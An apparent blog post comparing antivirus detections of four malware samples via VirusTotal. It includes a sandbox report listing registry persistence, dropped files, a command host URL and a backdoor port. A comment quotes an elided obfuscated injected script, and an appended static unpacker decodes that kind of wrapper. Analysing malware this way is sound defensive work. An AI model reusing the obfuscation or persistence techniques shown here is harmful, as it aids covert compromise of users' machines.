. . . . . . . . . from a book gets only middling belief,
You can grind out all sorts of things in a book, after all.
But something like this suddenly brings the ravings to life,
And you come to believe . . . . . . . . .
Quite unexpectedly, I came across three real, genuine viruses. They all got in together onto a computer (not mine), presumably from some auction site. Nasty things, yes. But that is a good thing too! Now a whole pack of antiviruses can be set on them and made to compare the size of their d... capabilities. Let them dance, let them sing!
Antivirus comparison
| Antivirus | Version | msdnc0.exe | msdnc1.exe | undname.exe | msdnc6.exe |
|---|---|---|---|---|---|
| AhnLab-V3 | 2007.10.2.1 | Win-Trojan/LdPinch.41984.J | - | Win32/Mydoom.worm.46080 | - |
| AntiVir | 7.6.0.18 | TR/PSW.LdPinch.cds.111 | TR/Crypt.XPACK.Gen | TR/Crypt.FKM.Gen | - |
| Authentium | 4.93.8 | - | - | W32/Worm.HUV | Possibly a new variant of W32/Threat-HLLSI-based!Maximus |
| Avast | 4.7.1043.0 | Win32:Ldpinch-AH | - | Win32:Lmir-BK | Win32:Small-CHC |
| AVG | 7.5.0.488 | PSW.Ldpinch.OMH | Win32/PolyCrypt | SpamTool.AQY | BackDoor.Generic8.TNJ |
| BitDefender | 7.2 | Generic.LdPinch1.ECBDA575 | Trojan.PWS.LDPinch.TAW | Win32.Mydoom.ABS | DeepScan:Generic.Malware.SFdld!g.478689D7 |
| CAT-QuickHeal | 9.00 | TrojanPSW.LdPinch.cds | - | I-Worm.Mydoom.bj | - |
| ClamAV | 0.91.2 | - | - | Trojan.Agent-7550 | - |
| DrWeb | 4.44.0.09170 | Trojan.PWS.LDPinch.1941 | - | Trojan.Spambot.2424 | BackDoor.Kiddy.origin |
| eSafe | 7.0.15.0 | Win32.LdPinch.cds | - | suspicious Trojan/Worm | - |
| eTrust-Vet | 31.2.5178 | - | Win32/VMalum.YPE | Win32/Mytob.NV | - |
| Ewido | 4.0 | Trojan.LdPinch.cdz | - | Worm.Mydoom.bj | - |
| Fortinet | 3.11.0.0 | W32/Basine.C!tr.pws | - | PossibleThreat | W32/Agent.ZGR!tr.bdr |
| F-Prot | 4.3.2.48 | - | - | W32/Worm.HUV | W32/Threat-HLLSI-based!Maximus |
| F-Secure | 6.70.13030.0 | Trojan-PSW.Win32.LdPinch.cds | W32/PolyCrypt.A | Email-Worm.Win32.Mydoom.bj | W32/Malware |
| Ikarus | T3.1.1.12 | Trojan-Spy.Win32.Agent.DI | Trojan-PWS.LDPinch.TAW | Email-Worm.Win32.Mydoom.bj | - |
| Kaspersky | 7.0.0.125 | Trojan-PSW.Win32.LdPinch.cds | - | Email-Worm.Win32.Mydoom.bj | - |
| McAfee | 5131 | - | - | - | Generic BackDoor.c |
| Microsoft | 1.2803 | PWS:Win32/Ldpinch.gen | VirTool:Win32/Obfuscator.O | - | - |
| NOD32v2 | 2564 | a variant of Win32/PSW.LdPinch.NEL | - | Win32/SpamTool.Agent.NAJ | probably unknown NewHeur_PE virus |
| Norman | 5.80.02 | - | W32/PolyCrypt.A | - | W32/Malware |
| Panda | 9.0.0.4 | Suspicious file | - | W32/Mydoom.DL.worm | Suspicious file |
| Prevx1 | V2 | Malware.Gen | Malware.Gen | Malware.Gen | Heuristic: Suspicious Backdoor |
| Rising | 19.43.00.00 | - | - | Worm.Mail.Win32.Agent.lv | - |
| Sophos | 4.22.0 | Mal/Basine-C | Mal/Basine-C | Mal/Behav-104 | - |
| Sunbelt | 2.2.907.0 | - | Infostealer.Ldpinch | Trojan.Mydoom | - |
| Symantec | 10 | Infostealer | - | W32.Mytob@mm | Downloader |
| TheHacker | 6.2.6.075 | - | - | W32/Mydoom.bj | - |
| VBA32 | 3.12.2.4 | MalwareScope.Trojan-PSW.Pinch.42 | Trojan.Packed.170 | Email-Worm.Win32.Mydoom.bj | suspected of Backdoor.xBot.1 (paranoid heuristics) |
| Webwasher-Gateway | 6.0.1 | Trojan.PSW.LdPinch.cds.111 | Trojan.Crypt.XPACK.Gen | Trojan.Crypt.FKM.Gen | - |
VirusBuster 4.3.26:9 didn't detect anything.
FileAdvisor 1 didn't detect anything.
svshost.exe was reported by Avast: Win32:Small-CHC and DrWeb: Trojan.DownLoader.origin.
Norman reported from its sandbox:
[ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* Accesses executable file from resource section.
* File length: 13312 bytes.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\wininet.exe.
* Creates file C:\WINDOWS\SYSTEM32\svshost.dll.
[ Changes to registry ]
* Sets value "SysRun"="{D7FFD784-5276-42D1-887B-00267870A4C7}" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad".
* Creates key "HKCR\CLSID\{D7FFD784-5276-42D1-887B-00267870A4C7}\InProcServer32".
* Sets value ""="C:\WINDOWS\SYSTEM32\svshost.dll" in key "HKCR\CLSID\{D7FFD784-5276-42D1-887B-00267870A4C7}\InProcServer32".
[ Network services ]
* Connects to "nsworklab.com" on port 80 (IP).
* Opens URL: nsworklab.com/ips.txt.
[ Security issues ]
* Possible backdoor functionality [UNKNOWN] port 2803.
Last update of the programs — 2007.10.01 or 2007.10.02.
The competition was run using the site virustotal.com.
from this site
Date: 2007-10-02 12:49 pm (UTC)
Re: from this site
Date: 2007-10-02 05:13 pm (UTC)
<script>document.write(unescape("%3Cscript%3E%0Afunction%20..."))</script>
in which a script is encoded
function dxdc ( x) { var i,j,r,l=x.length,b=(512*2),s=0, w=0, t = Array(63,12,61,26,18,44,29,.........,52,10 ), p=0 ;for (j= Math.ceil(l/b); j > 0; j-- ) {r=''; for(i=Math.min(l,b); i>0; i--, l--) { w |= (t[ x.charCodeAt (p++ ) - 48]) << s; if (s ) { r += String.fromCharCode( 233^w&255 ); w>>=8; s-=2; } else { s=6; }} document.write ( r)}}dxdc("gFDr1X............4EYoq")
which does I don't even know what. But hardly anything useful. 10.5 KB.
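The two layers quoted in the comment above can be unpacked statically, so that the result is read rather than run. This is an added example, not code from the post or its comments: the lookup table, the packed string and the `<iframe/>` payload are constructed stand-ins (the real table and data are elided in the comment), while the offset 48 and the XOR key 233 are taken from the quoted `dxdc()`.

```javascript
// Static unpacker for the two-layer wrapper: nothing is eval'd or written to a DOM.

// Layer 1: undo unescape("...") by hand (%XX and %uXXXX forms).
function percentDecode(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Layer 2: the arithmetic of the quoted dxdc(): look each character up by
// (char code - 48), pack the 6-bit values low bits first, XOR each byte with 233.
function decodePacked(encoded, table, xorKey = 233) {
  const out = [];
  let acc = 0, shift = 0;
  for (let i = 0; i < encoded.length; i++) {
    const v = table[encoded.charCodeAt(i) - 48];
    if (v === undefined) throw new RangeError(`character at offset ${i} is outside the table`);
    acc |= v << shift;
    if (shift) {
      out.push(String.fromCharCode(xorKey ^ (acc & 255)));
      acc >>= 8;
      shift -= 2;
    } else {
      shift = 6; // first character of each group of four only fills the accumulator
    }
  }
  return out.join('');
}

// Pull the lookup table and the packed argument out of the layer-1 script.
function unpack(html) {
  const wrapper = /unescape\(\s*"([^"]*)"\s*\)/.exec(html);
  if (!wrapper) throw new Error('no unescape("...") wrapper found');
  const stage1 = percentDecode(wrapper[1]);
  const tbl = /Array\s*\(([\d,\s]+)\)/.exec(stage1);
  const arg = /\}\s*\w+\s*\(\s*"([^"]*)"\s*\)/.exec(stage1);
  if (!tbl || !arg) throw new Error('lookup table or packed argument not found');
  return { stage1, payload: decodePacked(arg[1], tbl[1].split(',').map(Number)) };
}

// Constructed sample: a reversed 64-entry table and a 12-character packed string.
const TABLE = Array.from({ length: 64 }, (_, i) => 63 - i);
const SAMPLE = '<script>document.write(unescape("%3Cscript%3Efunction dxdc(x){var t=Array(' +
  TABLE.join(',') + ')}dxdc(%22Zl7LTMgNcU3:%22)%3C/script%3E"))</script>';

console.log(unpack(SAMPLE).payload); // prints "<iframe/>"
```

Run against the text exactly as quoted in the comment, `unpack()` stops with an error, because the elided table no longer matches the digit list the decoder needs.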